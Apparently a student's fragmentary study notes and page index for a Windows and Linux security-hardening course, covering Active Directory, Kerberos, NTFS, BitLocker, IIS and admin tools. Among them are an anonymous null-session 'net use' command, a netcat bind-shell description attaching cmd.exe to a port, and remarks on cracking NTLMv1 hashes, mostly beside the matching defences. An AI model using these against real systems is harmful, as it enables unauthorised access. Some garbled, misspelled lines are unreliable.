windowes xp sp2,windowes2003                                                                module 25
can't join domain,no GPO,no Efs,no dual cpu support,no editable file system ACL
windowes firewall,improvement in automatic updates,security center applet,DEP
Data excution Preventation
prevent excution of code in areas of memory that aren't intended to hold excutable data
in xp sp2 annoynoums over the network rpc are not permitted
not permitted to send user data only udp sockets are allowed
credential roaming support,wifi protected access,network access protection
IE7 not included in xp sp3 ,upgrading IE must be performed separately
standered server,enterprise sever,datacenter server
support two 32-bit cpu,no more 2Gb or ram,can act as pop3,available for channel partners
edtions to provide scalability,fault-tolerance,clustring,network-load balancing
32bit or 64bit,Distributed file system,ADFS,ADAM
enhanced in 2003 R2,allow user to access shared files
active directory federation services,single sign-on across forests and company boundaries
active directory application mode,LDAP-based services,better unix support
ADAM,for application which don't store data in active directory,but use authentication
not incremental upgrade to win xp,slow performance ,backward comptability issues
can vertify integrity of boot-up files,encryption key in usb or TPM
to warn users when malware attempt to exercise their admin rights
inclued in windowes 7 by default
the storage of your EFS decryption key on the same card you logon with
managable through group policy and NETSH.exe
managable through group policy and NETSH.exe
specify what software is alllowed to run on users pc centrally
win7,win2003R2,allow remote users to access enterprise without worring about VPN
standered and enterprise,support 32,64bit,take care of hyper-v support
component modularization,server core,RODC,NAP,SSTP,
easy addation/removal of these roles and features
server2008,doesn't include startmenu,taskbar,control panal or internet explorer
new graphical interface,modularized,Ftp-over-ssl is available
can use bitlocker with tpm chip and likely installed with server core option
check if users have the latest patches,recent virus updates,
SSTP,encapsulate packets in http,then encrypt using ssl
RRAS,support both ipsec and ssl vpns
routing and remote access service
ability to host individual applications on RDP server instead of entire desktops
give user GUI of another remote host,in server2008 enhanced features
.net integrated framework for excuting commands and scripts
built in server2008 -64bit only,is virtual machine system
active directory recycle bin,is 64 bit only,branchcache
server2008 R2,enable smb or http caching via peer to peer or centrally hosted
full operating system,rsa secureID
slot in mobiles,multi gigabyte memory at least 8 giga
malware can move from pc to mobile and vice-versa
centralized control over windowes mobile
Centralization Conf. Management, Anti Malware Scanners , Data Enc. & Acces Control
for windowes mobile,airscanner,bitDefender,F-secure,computer Associates
for windowes mobile,checkpoint,Credant,SafeBoot,Trust digitall
patching,backup
windows computers that share information in absence of any domain controller
no domain controllers
simple,each pc protect itself,lower costs,each user is admin on his pc
no centralized management or auditing,no single sign-on,difficult to manage large no users
account applet in control panal,start>administritve tools>computer manaement ,NET.exe
for each user or group,unique,
S-1-1-0 Every one Group,S-1-5-11 Authenticated users group,s-1-5-32-544 local admin group
your identf. & rights,each program has a copy of SAT, whoami.EXE / all / fo list --------->win.7   sat
the names and sids of ypur groups and all your user rights SAT
database of user accounts
server to manage active directory database
each resource has a list contain (SIDs and permission of each SID to this resource)
change in AD database will be replicated to all other domain controller automatically
primary domain controller can modify database
backup domain controller receive changes from other AD
in active directory on ever object if any conflict the later change override the earlier


a list of chache is tracked so if comprmise the users is forced to change passwords
accounts,kerberos master keys,certficates,replication links,ou,trust relationships
maximum size is 4TB
never sent over the network,important parts sent in the network by authentication protocol                 sat

Default ,AD is the key ditribution center for kerberos, your kerbores key is derived from your
password, kerberos-appl in windows don't need to be kerberized like unix, kerberos-found in IKE,RSVP
but not in(FTP,telnet), kerberos-faster than NTLM&clients can cashe&reuse their ticket


Kerberos-found in SMB/CIFS,RPC,LDAP,HTTP,dyn DNS,IPSEC ,IKE,RSVP, NOT FOUND in FTP , TELNET
if intial kerberos exchange captured can be vulnerable to bruteforce ,Kerberos-vulnerable to
bruteforce , ticket request encrupt by user password

NTLM v2 is not vulnerable, NTLM-predecessor to kerbreros &still supported for compatability, NTLM-
used in workgroup&domains, NTLM-use user passphrase hashes to compare it in domain, NTLM-v1
vuln to sniff&crack(cain)be it use lanmanager & NT/MD4, NTLM-v2 not vuln to crack where it doesn't
use lanmanger, NTLM-is supported by win NT &later
one or more AD that replicate portions of database and which all trust each other

special domain controller which replicate across domain boundries

portion of AD that is replicated across domain boundries , is the part of DB replicated bet domains ,
forest-schema is all possible types of ojects&their att in domain , forest-configration naming context
(sites,subnet,intersite repl link , forest-schema&configrations are replicated& sync in all the forest ,
define all types of objects and their attributes in directory
define all the sites,subnets and inter-site replication links
two domain trust eachother
created manually,tansitive,two way or one way trust == Cross forest trust-all server2003,no
reblication,transit 1 or 2 way == Forest-inside one forest all domains trust eachother by default ==
Forest-cross forest trust must be created manually == Forest-cross forest trust is transitive so all
domains in 2for trust == Oneway cross forest trust-one side trust the other side == No cross forest
replication in cross forest trust == Forest-inter domain replication in the same forest
the trust passes through chain,
access to resource goes in the opposite direction of trust direction
password policies,account polcies,audit polcies,ntfs,kerberos

special logon scripts when run can configure almost any thing in computer == Group policy-configure
each security option in win 2000&later == Group policy-is the most important data replicated bet
domains == Group policy-are special login scripts when run ,reconfigure anyth == Group policy-run
when computer boot & checked every 90 to 120 == group policy-run user GPO when login&PC ckeck it
every 90 min == group policy-in active directory applied to sites computers &Ous == Group policy-how
to open & edit it in local pc or active directory

a collection of updates and hotfixes rolled up in one large installition package           service pack-
giant patch has som hotfixes&updated together                                    service pack-is bet 100 to
300MB                                                                                                       module 26

lab test +deploy in limitied groups(staging) == don't staged roll-outs & check for problems ==
service pack-test it at lab first because it break application or net problem (test by VMware)
few boxes at atime,start with the least important,end with the most critical
update the source of windowes so when installing it with sp one shot


xp and later , schedule commands to run at specific time or periodicaly , excute batch
excute process on remote machine , without going to pc , excute batch , included in resource kit
excute process on remote machine , without going to pc like telnet , excute batch
batch file then run it remotly or from psexec.exe or schtasks.exe or exec.vbs
map network drive
use by built in windows installer service on each machine to handle installation process
small program will update few os files with updated versions == hotfixes-patch one security hole by
replace oneor more of sys file ==fix single problem==
fix many issues at once
fix many issues at once

sites::sans,microsoft,securityfocus,packetstormsecurity.nl == easiest way to stay on top of new patches
a web site load active x control into IE to scan system for missing updates == disadv is not automatic
update == scan for missed hotfixes&install it ==

connect in background on scheduld basis built in win2000 and later == windows/automatic update tab
in win2000sp3&later(AUT,schedled) == update use ISO file
microsoft bundle latest updates and patches in one single iso file
WSUS,2000 or later,free,install updates for different ms products,handle over 10000 pc
old version of WSUS
old version of WSUS
must run on IIS6 or later,client connect via HTTP or HTTPS,use BITS
download in background and other application aren't interupted

imported from Wsus server into GPO
sites :: shavlik.com,bigfix.com,ecora.com,gfi.com,patchlink.com

backup-system state(registery,certificate DB,AD database, boot-up files
built in win xp/2003 ,backup locked,encrypted,registry files , restore center vista
can be created using ntbackup.exe

include registry , boot-up files , other files depending on what services installed , schudule backup to
run locally
backup and restore center in control panal,not by location
to restore files backuped by ntbackup to vista/2008/seven
backup all drives and system state,backup selected file types,
doesn't support : backup all drives and systen state
builtin 2008/vista/seven and can be installed on xp/2003
copy large files in long folder path,copy EFS files,can mirror folders,can't copy locked files == backup
utility to backup selcted files in vista ==
options
2008 and later,optional ,can copy locked files,backup system state,volumes

console snap in,can't backup selected files,like wbadmin,copy locked files == at server 2008and later
allow to copy files that is opened or in locked case
ARCserve,ultrabac,Archive,OmniBack
using dd command , symatic ghost tool, create image
create image files,can search image,can be burned to cd/dvd
used to create binary disk images
available on xp and later and not availabe for windows server2008
to create auto. A variety of time
after instal os,every24,before updates,before new sw,before new driver
registry settings,ini configuration files,some os files ,doesn't restore user data files
include changed data files and older copies of folder "previous version tab"
windows restore include data files and latest changes that can be restored

right click folder>properties>pervious version tab

related to system restore
allow regulation to resources (files-folders-printers-registry keys) == consist of(SID of user domain
AC+SID of domain group                                                                                     module 27
file system for cdrom
no auditing ,no access control ,no fault tolerance
inter process communication across network using SMB,only buffer areas == file system used to
leverage SMB p in interprocess com == acts as RAM with shared folder
maximum size is 16TB,transaction oriented processing
permissions,auditing,encryption,compression,transaction oriented processing
boot from another sys , recover sw on FAT
to ensure that the file system consistent in case of power failure or blue screen == Transaction
oriented proceessing use CHKDSK.exe
by NTFS driver itself not 3rd part,make file blue in color
used to check file system consistancy after poweoff
aset of NTFS permissions on a file or a folder,sum total of ACE
DACL always enforces & no matter from where file access
individual permission of user,group,computer on object,indviual entry in DACL
modify NTFS permissions for win2000/xp/2003
built in 2008/vista,modify ntfs permissions
is individual permission access control entiry
custom indvidual ACE that doesn't translate into standered ACE


collection of one or more individual ACE
gray-checked box ace
solid-checked box ace
not mandatory,only root folder of a drive can have only explcit ACE




permissions applied to the owners,automatically granted to owner
no longer needed,to provide elevated powers to some user without being admins

grantee least perm to users

can only contain members from the domain where created == contain users of the same jobs,shared
needs
can contain members from any domain in entire forest ,can include user accounts == have users from
different domains
account>global groups>universal groups>local groups<permission == inner grp outer grp
how can a group be created
like an e-mail list
only available in AD native mode
allow sharing of resources files printers
like SMB with enhancement,NetBios is not necessary with it
network places,mapped drives,start menu run,shortcuts
no inheritance,multiple share names with different permissions
are enforced when access is done through SMB
used in sharing
default is full control for every one and this default can't be changed from registry
default permission is read for everyone group
full control,change,read       no inheritance in share permissions
enter full UNC,C$,D$,ADMIN$>c:\windows,permission administrator full control
$Admin allow authenticated users group
two reg keys are set to zero "autosharewks"REG_DWORD "autoshareserver"REG_DWORD
shouldn't be modified

full path to the network share
DB of == configuration setting for all computer hardware,applications…
cmd tool to edit ,view registry
GUI to Edit view registry
yellow folder holding files called values
file-looking objects contain the type:REG_Dword and data which is the set to
service allow remote connection to registry. to disable remote remove this service
REGSVC.exe,service allow remote connection to registry
against local and remote access to registrt,share permission,WINREG key
key to control sharing permission of registry,default values see book ==used to put share per to
registery
a subkey in winreg define the registry paths that can be readable paths
provide auditing captabilites
regedit>highlightkey>edit>permissions,use security template or GPO
each object has SACL ,DACL and creator owner
container in active directory contain users,computers.
delegate some authority..readinf data for hr

perserve integrity of os files,registry,data between applications,previously WIC == enable by default in
win vista
has label(system,high,medium,low) on each object(folder,registry key,shares)
contain integrity SID for MIC label,list of all user rights


can check,modify your mic label
can check,modify your mic label == tool to restrict read and excute access by lower process

low for temp internet,medium for users,high for admins,services run as system == Low label -->
Internet Explorer == High label --> administrative privilages == Meduim Label = default
process can't edit securable object unless the object is the same or less MIC label
by default doesn't restrict read or excute


can show your rights on the system

general captability not tied to any object == rights for user on the whole machine not specific obj
(local sec policy-local policy-user rig
manage user rights from command line

only admins by default
can make copy …ignore ntfs permissions

require debug programs right,insert thread into address space of target process


cmd to encrypt and decrypt
is debbugger tool in windows,used oly when debugg right

use AES 256bit >encrypt AES key using public of certficate>encrypt the private by password == protect
from linux boot,stolen backups == in NTFS,windows2000or later,USB,removab

diffferent keys for os
PFX file encrypted by password
to create a recovery certficate to that path
on vista and later arecovery certficate on smart card,filepath for .cer
the private key is in the profiles of local admin
strong password,smart card,syskey,encrypt folders not files
encrypt password hashes for accounts and private keys with 128bit rc4 key derived by passw

to put passphrase at boot up
bestway to use password not to store locally
to wipe files from hard disk,file scruper,remove plain text remains


vertfication of inegrity,sector-level encryption
win vista/ultimate and enterprise ,server2008,not in vista business or win7 professional
 for whole drive with paging&hybernate files
contain windowes files c:/windows
two ntfs volumes boot volume,system volume
two drive volumes boout up &system
contain files used during the boot process
Boot Sctore , Master Boot Record , BOOTMGR , BIOS code
128bit AES or 256 AES,encrypt decrypt the volumes of bitlocker
integrity check using SHA-1

built in motherboard,random number generation,cryptographic operations
enable bios,turn on windows then intialize windows with owner password


tpm+usb+PIN , TPM+usb , Tpm+Pin , Tpm only , usb token with no tpm
TMP only
windows management instrumentation,can write scripts for administritve tasks
passwords can be extracted from RAM through dump raw memory
time consuming,full decryption
quick,temp,doesn’t decrypt,key saved in plain text on hard,good 4 updating bios
4 ways
string of ASCII ,saved to file,used only when managing tpm

48-digit PIN inserted using function keys == FVEK when recovery password lost == BIOS support
function Key to enter PIN or during emergency
push recovery keys to AD and FVEK
AscII file contain configuartion of security settings,snap in                                         module 28
password policies,account lockout policies,kerberos policies,audit policies == ASCII files contans
security setting

.inf file stored by default in /systemroot/security/templates

using notepad or MMC.exe
edit security template

Security Template from Microsoft, NIST, CIS --> debugged and tested == Template from Microsoft,
NIST, CIS --> debugged and tested
EC,for computers joined to active directory 2003 or later
SSLF,maximum security template scarfice backward comptability,peak performance
specialized security limited functionalty ,, template sec level
fedral desktop core configuration
security templates and configuration guides and assesment tools to go with them

used test OS against security tem benchmark

used to configure computer to match security template in one easy step,no undo == is used to import
temp & apply it to PC == SCA limitation --> only on local machine not across network
SCA,can save database file .sdb,can't apply through network

cmd tool for security configuration and analysis SCA
configure computer using the database from floppy
mmc snap in,current pc setting except ntfs and regisrty key ACLs,applied automaticaly
mmc snap in,current pc setting except ntfs and regisrty key ACLs,applied automaticaly
even when no one log on
applied to current user desktop
can import security template in it ,some setting in template not in the GPO
scripts can be written in any scripting language,interpreter
startup/shutdown run in computer context,logon/logoff run in user context
container for many security setting from registry,restrict control panal,password sceen saver
ADM/ADMX templates ,ADM any win version ,ADMX from vista and later
has templates to configure all office products,word,excel,..
administrtive templates,can be edited using notepad,ADM for any win version,
are stored in active directory database and replicated to all domains == domain group policy-at
startup/shutdown-pc download computer conf. == domain group policy-at login/log off-pc download
user configuration == 90-120 min for any policy change
linked only to particular OU
applied to every one at the top level of domain

GPMC ,download for xp/2003 by default in vista /later ,, used to configure domain GPO in forest
updated to other domains in 15 minutes and workstations update in 90-120 min

max-length:127,minimum password length:15 == password policy&recommended settings(use
passphrase)
prevent users from recyling their old faviorate password
duration,lockout threshold:5,account counter lock out:45min
***********3 pages***********
***********2 pages***********
null session vulnerability,not used with xp and later so much
smb session to server where username and password are blank
create null session,
net use \\target\ipc$ "" /user:""
to stablish null session
from GPO or registery by seting RestrictAnonymous to 2 === Null user session SMB session without
usern,passw

set to 2 to disable null session,system\currentcontrolset\control\lsa
Do not allow anonymous enumeration of SAM accounts and share --> enabled
anonymous access-allow anonymous SID/NAME translation--> desabled
NO access without explicit anonymous login
lan manager authent level-GPO security option , NTLMv2 not vulnerable to cain + rainbowcrack ,
Kerberos uses UDP

software to crack passowrd hashes , NTLMv2 not vulnerable to cain + rainbowcrack
send NTLMv2 response only , refuse NTLMv1


not vulnerable
net user password /active:no /time: ,
disable guest&random pas
simple file sharing winXp all remote authentication done using guest account
with simplesharing disable users authenticate as themselves , Classic-local uesrs authinticate as
themselves

admins,domain admin,enterprise admin,schema admin,dns admin,account operator == Built-in
administrator account cannot be loged out == administrator account lockout from over the network ==
limit local account use of blank password to console logon only == administrator account policies
&recommendations
strong pass,smart card authentication,enable lockout for admin account,decoy account

can launch programs under different privilages , program in vista to run programs with other privilage

define exactly what excutables can and can't run in winXP or later == who can or can't launch process
or sw ==
4 exceptions,hash of excutable,issuer of digital certficat,UNC path of excutable,zone
help to fight malware,which process can user run , MD5 - UNC - Zone , SRP exception to allow or deny
by 4 methods , Basic User , Unrestricted , create exception to default policy , Default deny policy ,
Default Allow policy , Disallowed

enforced options,designated file types,trusted publishers options
Global SRP,to exculde admins and maybe dlls from SRP policies
Global SRP,define which file types the SRP policies apply,can add new file types
determine who decide to trust certficates,whether CRL is required
at least one server 2008 -R2 to push GPO of AppLocker , server2008/7 R2-enhanced SRP with new
options , improvement in SRP
how normal users could run SW in higher previ ,, GPOs used to control it,standard&admin users ,, how
to turn it off ,, how it work using users &process mic lables ,, how to run as admin ,, Standard user
process: medium or low MIC label:::SAT stripped of dangerous priv. ,, Administrative user process:
high or system MIC label:::standard SAT for admin group member ,, UAC can be managed or turned off
via group policy
tool to run as adminstarto=RUNAS.exe

IE8 or later launch seprate process Iexplorer.exe
on:when MIC of explorer is low,off:when explorer run by administrator
special folder when running with MIC :low
used by internet explorer to run active x control when MIC is low,same as ieinstall.exe == run by IE in
high previlage"broker process"
used by internet explorer to run active x control when MIC is low,same as ieuser.exe == run by IE in
high previlage"broker process"

99% of IE settings usin GP , few change will block most exploits even without patches but these change
breack func.
*******2 pages*******
check for phising,malware web sites,check via microsoft database,automatic,manual
define exceptions to permit dangerous features for URLs that you trust
list URLs for sites that you don’t trust
examine the flow of data back and forth between web server and browser ,detect XSS
IE8,maintain privacy against attempts to track users via multiple sites
compare URL against list of known phishing sites & malware download URLs




include both known phishing sites & malware download URLs
a hardened machine against vulnerabilities not discovered yet                                  module 29
administrtitve tools ,security template inf,GPO,Sc.exe
disable all the undesired services in one shot
service startup settings
to disable service
disable service
configure each aspect of every service or device driver on local or remote machine
query list of services from remote pc
getkeyname to get the registry key for the service
show more details extended information about the service specified by registry key
query the configuration information about the service specified by registry key
to stop service specified by the registrykey from getKeyName
start=disabled,to disable service permentaly specified by registry key
from dependencies tab you can know what services depend on what


in disable service , disable the world wide wep publishing service
server2003 sp1,can't be installed in vista/seven,work in server2008
builtin knoweledge about services ports and network components needs for roles or functio
you can select roles you want & SCW will perform many security reconf. Tasks for you
you can roll back the last set of changes
can be used to configure server or to analyze the complaiance to this policy

cmd tool for thw scw GUI,scriptable version
file.xml is the policy file which will configure a server with for services run,disable,stop
enable/disable service,configure firewall roles,ipsec policies
view the report from scw using nice gui
to see analysis and report options of tool,/m:machineName,/p:path&polocyFile,/o:output
can configure list of computers but you can't rollback a list,to config OU
/p:file.xml /g:grouppolicy file ,can take xml policy file and convert it to GPO
server2008 and later,orgainze server captabilities into rules and features,help dependency
cmd tool for server manager ,scripting enable
no standard graphic
a path of communication between network component and physical network adapter
a path of communication between network component and physical network adapter
returns the local NetBIOS name table for that computer,name and code
name and code number reveal the service running on the target,registry_Key=netbt
********2 pages********
the code numbers can be looked up in the following table to reveal what services are running
required for full backward with older operating systems
netbios not realted to null session
query the configuration information about the netbios service
disable netbios service
system default case for netbios

LDAP,deafult protocol for searching and editing active directory database
cleartext:tcp389,ldap ssl encrypted:tcp636,global catalog:tcp3268,global catlog encryp:3269
tcp/udp/88,tcp/udp/464 for kerberos change password,tcp749,tcp/2053
tcp/udp/137
udp/138
tcp/139
windows firewall with advanced security ,ICF internet connection firewall old edition
wfas,statefull firewall can be manged through group policy and netsh.exe
no support for automatic upload to central server
public,private,domain network
a trusted network that doesn't have domain controllers
like airport most restricted rules
is categorization label assigned to network adapter card and the network to which it is attached at the
moment . When first connecting you wil be prompted to choose
used to access domain controllers for computer's active directory, prifile select auto when active
directory detected
least stricted rules
text file in W3c format,maximum log size is 32mb
all inbound connection will be blocked even there is a rule that allow them
how to make a rule "programs & services , users & computers , protocols & ports , scope "
mutual authentication and packet signing
mutual authentication and encrpytion
netcat run and listen to 7890 and connect an incoming session to new instance of cmd.exe

best rules that matches win
manage windows firewall and network related services,mange ipsec
allprofiles,summary of your profiles options(domain-private-public)
rule name=all,dump the details of every rule
rule /?,how to crreate rule,
mutual authentication,encryption,packet signing,ipsecpol.exe,ipseccmd.exe,netsh.exe
windows 2000 resource kit to configure ipsec
windows xp,download from microsoft,to configure ipsec
see all ipsec configuration using netsh.exe ipsec dynamic add mmpolicy name=TempMMpolicy

block all packets netsh.exe--->netsh.exe ipsec deunamic add rulearcaddr=any dstaddr=any ,, allow
ICMP packets ...… ,, allow packets to/from TCP port 80 ……… ,, to getrid of thepolicy & its rules …..
pc will attempt to use ipsec if not will back in plain text for backward comptability

pc will not require or request ipsec,but ipsec is enabled,GPO option
secure server (require security) , server (request security)
ipsec policy with 3des mutual authentication,only ipsec is allowed,GPO option
will request mutual authentication but will fail back to text if client doesn't support ipsec
ssl/tls vpn require win2008server,no problems with nat or firewalls,see book
assist ipsec in taks as user authentication and RADIUS policy enforcement
nat problems espcially with more than 1 natting device
no ipsec,no nat problem,PPTPV1 vulnerable,use PPTPV2
vulnerable ,ms_chapv1
use 128-bit rc4 encryption,ms_chapv2
built in win,vpn tunnel like interface,suppot smartcard,logon desktop via VPN
like any regualr interface for vpn connection ,Desktop logon
for vpn if smartcard required use EAP
multiProtocol router,can make Nat,load balancing,fault tolerant,NLB driver built in
built in RRAS to support load balancing
routing and remote access service,stateful firewall built in win server but not enabled ,, maange with
RRAS snap in or with NETSH.exe
ISA,doesn't have vpn built in
collection of services can be installed seperatly or not inculding HTTP,FTP
version 7 on server 2008
is installation option

it should not be member of the main internal forest but for separate forest

inculde handling ASP.net framework & XML configuration files
included in server 2008 r2 not in server2008
to install Web server IIS role , run server manager to install the component need by check box to select
adding app. Like (ASP,ASP.net,CGI)
install/uninstall roles & features
to see which roles or features are installed right now
System:full control , Adminsitrators:full control , Everyone:read & excute

Have separate drive volumes for OS and web content , apply suitable security template from microsoft
or CIS to OS volume , configure NTFS permissions by principle of least priviledge
account for anonymous http access to IIS
can host many site simultanously by three ways : port,ip,host header
IIS will drop processing the request & return error msg , to create newsite open IIS manager console ,,
configure existing website ,,
IIS host header can block it if configured,require .ida mapping on win2000 ,, IIS not process the request
of script kiddy who only use ip add. , port to connect to server as they connect wrong host header like
code red worm
Iis component that handle process certain request,Dll,exe
compiled from C++ code
.net type,c#,vb.net code
when static html is requested
when directory list is generated
dlls excutables loaded in memory address space of web service itslef
require *.printer mapping on win2000
require *.htr mapping on win 2000
require .asp mapping
scritpts , cgi , msadc , printers , iishelp , iissamples
protects a machine from old rain forest puppy rds exploit on iis4
on iis4,can be prevented by removing msadc folder from iis
used by outlook web access site for exchange server
outlook web access worm can be prevented by removing or renaming iis exchange folder
tls/authentication requirements/ip address restrictions
compatible with all browsers,send passwords unencypted,use ssl with it
free application firewall for iis5/6 scan http requests and reject bad requests
free application firewall for iis5/6 scan http requests and reject bad requests
can be configured through xml files,like urlscan.dll
per-site,per-folder,per-file,by default everything will be logged

NTFS permissions Allow full control system & admin. , Deny full control IUSR
cmd http client
manage http can use ssl
use local time for file naming and rollover
script take 2 argument :iis log file,text for regular attack patterns and search for those

in sql server,authentication method using active directory and kerberos
graphical remote control of virtual desktops hidden in ram of the rds server
remote administration,application server
terminal services on xp/vista,prevent user with blank passowrd to logon

active-x version of remote desktop client on server2008-r2 and later
terminal service and remote desktop use RDP on tcp port 3389
Remote desktop protocol
low-client comptiple-high-fips compliant
rc4 is not permitted
in RDP6,authenticate client and server before session is created in memory,prevent DOS
NLA support,server 2008 later built in,download for xp ,2003
performance enhanced not security
NLA,128bit encryption minimum,Tls,smart card,block access to local drives
enhanced management captabilities in rdp clieny,thin client for linux,solaries,mac
200 question,make report with pritorized action list,prespective of ciso
microsoft security assesment tool,200question,report
microsoft baseline security analyzer,patch scaning,scriptable
the gathering analysis of detailed information about network                                         module 30
everything can do with a windows without mouse
from windows installition cd cd:\support\tools\suptools.msi,win2000,2003
********* 1 page**********
vista and later,allows an administrator to sit at workstation and manage active directory
vista and later,allows an administrator to sit at workstation and manage active directory
documentation , scripts , tools , for :: IIS,SMS,SQL Server,Exchange
*********3 pages **********
******** 2 pages **********
wmic.exe <item> list full ******4 pages*******
get the latest service pack installed on system
output is 15~30 mb ,5 to 15 min to run
wmic.exe , netsh.exe , getmac.exe , ipconfig.exe , route.exe , net.exe , netstat.exe , nbtstat.exe
troubleshooting tool,2000,xp,2003 only,variet of testsand dump the output to console
run all tests available,show more data
run specific testName and show more data
like cisco ,int to interface,set machine ip allow you to excute commands remotly
allow you to excute netsh commands remotly
retrive the hardware address of remote computers
can be used to show shared folders,drive mapping,account and group information,services
show all listening ports
variety of ip settings
show routing table
netbios realted data
process explorer,autoruns,psexec,rootkitrevealer purchased by microsoft
foresnsics toolkit,Ntlast,Fport,scanline
dumpsec,dumpevt,dumpreg
active directory tools
a taskManager replacement,sysinternals
allow you to see and edit start up commands at boot,sysinternals
remote excution of commands,sysinternals
help to detect rootkits,sysinternals
show computer configuration ,service packs,patchs,software
Afind,Hfind,Sfind,Filestat and hunt,file system analysis list of files accessed without modifin
by foundstone,show hidden files,alternative datastream
help you scaning event logs for things ,comma delimited output for easy ,foundstone
print table of tcp/udp connections and the excutables attached to them',foundstone
command line port scanner,when winpcap has problems ,foundstone
dump event logs into plain text AscII,somarsoft
dump the registry to plain text AscII,somarsoft
can dump ntfs permissions and audit things to text file,somarsoft
tools to enforce passwords to expire,list groups of user,unlocking user accounts
dozens of vbscript
interface all scripts use to do things and also wmic.exe
windows management instrumentation,interface for scripts to use
********3 pages ********
to get scripts
to see your enviromental variables
cmd replacement,perl-like,win server2008,7 by default,available for xp-sp2
create com files,object oriented
graphical management tool wrapper for powershell
tool run within powershell,support pipeing
pipe symbol | , list local event , show the last 20 events , show only warning a7 error
domain controller multi-masters replicate scripts to each other usin it
startup/shutdown run in computer context,logon/logoff run in user context
cause the scriptto be downloaded and excuted locally
task schedualr , LSA Secrets portion of the registry
by schedule
to ensure changes are made within control parameters as a part of configuration managem
any change done by IT department written here
maintain and check written logs,examine machines with tools

cmd for SCA , steps
free,take range of ip to scan,another dangerous service in SQL , launch MBSA
4 pages

scan remote hosts for missing hotfixes,analyze data and return it in ftp,mail,smb
/r for ip address range,/f for redirect output to file
List all the reports that are available
Display a detailed report
collection of data that documents the configuration and running state of machine
computername_type_date
section with labels,username and domain of who run the script
user accounts,group membership,shared folders,user rights,process,network coniguration
iis seprate registry,you have to include it in a system snapshot
******4 pages********
Compute SHA-256 message digests
lockout and password policy
get the current audit policy for all categories
get the winsock all api about network configuration
show windows firewall settings
list the system drivers
systeminternals autoruns
show directory and all subfolders
cmd tool,print difference between files
gui of fc.exe show difference of files
free third party tool to comapre files
like the linux less command,open large iles but don't load entire file at once
free comaprisons between files from mandiant
application,security,system,directory service for active domain,dns server , description field
where os applications and third party tools write
write your own entries to event log using this command line tool




audit account logon events,audit account management,audit directory access




tool from resource kit enable or disable audit polcies from comand line

enable it only nothing will be logged,enable it then enable sacl for your logs
different for different objects,can be inherited

audit the interesting things,logs,privilage access,changes to admin access
can monitor folder if exceed will alert
maximum of 4.2 Gb but actually 300mb
no problem because xml logs can be compressed
three options,overwrite events as needed,overwrite older than x days,don't overwrite




central database for all logs,psloglist.exe,dumpevt.exe
dump the event log in text file and sort it
Mom server ,centralize log ,watch servers,extract event logs and audit data
centralize log,watch servers,extract event logs and audit data
key word                               book       page     Column1
windows and linux                             6       5    over 90% (93.4) use windows
better os                                     6       5    all have adv. And limitation and liabilities and since they get together they represent risk
cygwin                                        6      7,8   make windows linux smart or ( linux aware ) and allow some unix software to run directly in windows( all versions except CE) and you must have access to the source code ( can
mac os x                                      6     7,12   UNIX/BSD and software)
                                                           compile server also have server edition 7% market share,2nd most popular os,it is more intuitivefor beginning uses than windows and linux
cygwin isn't linux                            6       8    have some linux commands and utilities and it isn't linux emulator for windows so it is "half-way" step to linux
                                                           it can be entire environment of development tool that have a lot of power ( as develop software for GNU project) and alow windows developers to do some neat advanced
cygwin uses                                   6      8
                                                           programming in windows
cygwin base install                           6      9     give u nice but small selection of linux shells and command and you can add more programs later ( by running setup.exe)
cygwin setup.exe                              6      8
linux vs. cygwin                              6      9     cygwin not for something you can depend on to work consistently
cygwin power                                  6     10     adding powerfull scripting to windows (there are something windows can't do it easily or can't do it at all)
mutt                                          6     10
cygwin functionality                          6     11     install linux lib.and prog it needs in cygwin to communicate with service on native linux server)
cygwin commands                               6     11     as dig ( domain name specific) that is better than nslookup, also can use gnu development tool to write linux and windows code, also we can use it as X server
                                                           not considered high power and not quite ready for serious use it was used for graphical work and disktop publishing, hav noisy network protocol, it is used for desktop work not
pre mac OSX                                   6     12
                                                           server work
apple finder program                          6     12     similar to windows " network neighborhood", in large network with multiple os make bandwidth issue
MAC OS password assistant                     6     14     grades strength of passwd red-->weak yellow --> passwd ok green--> strong passwd
 MAC OS file vault                            6     14     strong encryption user home dir it use 128-bit AES
open ssh                                      6     14     encrypt remote access that replace telnet and ftp and it is included in mac by default
IPFW                                          6     14     personal firewall installed and on by default in MAC OS
linus torvalds                                6     16     creator of linux kernel ( rewrite Minix for intel 386 platform) his code represent only 2% of the kernel now
linux importance                              6     17
O_DIRECT                                      6     18     kernel flag in linux allow programmers to take adv. Of write directly to device
ubuntu                                        6     19     debian linux,desktop&server,install in 40 language,(amd64,i386,ultrasparc,powerpc) supported arch,APT(for package management),no GUI firewall and isn't configured by default
                                                           redhat linux,desktop&server (choose by installer),(i386,x86_64,powerpc,alpha,sparc)no amd64,25 languages,RPM(for package management using yum), firewall included and
fedora                                        6     21
                                                           enabled by default
linux live cd                                 6     23     allow you to test drives,no HD required or installed, excellent for forensic work and troubleshooting also used for rescue and recovery
live Distro                                   6     23     as live CD but for any bootable media as usb,floppy,external HD,ipod
OS overwiew                                   6     25     kernel , shell, hardware
kernel                                        6     25     memory residant part of the Osloaded in memory at boot ( manage HW and the executing processes)
shell                                         6     25     the portion of the OS with which users and process interact directly ( it is command line interpreter& provide user with interface to the system)
kernel services                               6     26     File system,low level network protocol support ( ip),memory and process management
file system structure                         6    27,28   /bin, /usr/bin , /usr/local, /etc, /dev, /var, /tmp, /home, /mnt, /usr
file system                                   6     27     actually location of the information
mount point                                   6     27     is where the computer puts the file system so it can access it
absolute path( reference)                     6     29     the path specified from the top of the tree to the desired file
shell                                         6     30     listen to the terminal then translate request into action by the kernel and programs
shell examples                                6     31
linux and DOS corresponding commands          6    32,33
linux file permission                         6     34
chmod                                         6     37
setuid                                        6     38     programs run with owner permission used with executable files--> perm rwsr-xr-x
setgid                                        6     39     same as setuid but programs run with group perm
setgid for dir                                6     38     when new file is created in the directory it will inherit the group of the directory-->perm rwxrwsr-x
stiky bit                                     6     38     delete only ur files not others file --> dir perm rwxrwxrwt
extended perm                                 6    41,42   setuid,setgid,sticky bit and specified through fourth number in chmod
chown                                         6     44     change file or dir ownership --> chown username file|dir , chown user:group file|dir
chgrp                                         6     44     change file or dir group --> chgrp groupname file|dir
newgrp                                        6     45     login to a new group ( when create a file it's group will be that grp) -->newgrp grpname
groupadd                                      6     45     create a new group -->groupadd grpname
groupdel                                      6     45     delete a group --> groupdel grpname
/etc/group                                    6     46     system group db --> groupname:group passwd:groupid,group members
                                                     used to assign a passwd to a group gpasswd group -->add passwd to a group gpasswd -a user group -->add user to the group gpasswd -d user group --> to delete the user from
gpasswd                                  6    47
                                                     the group
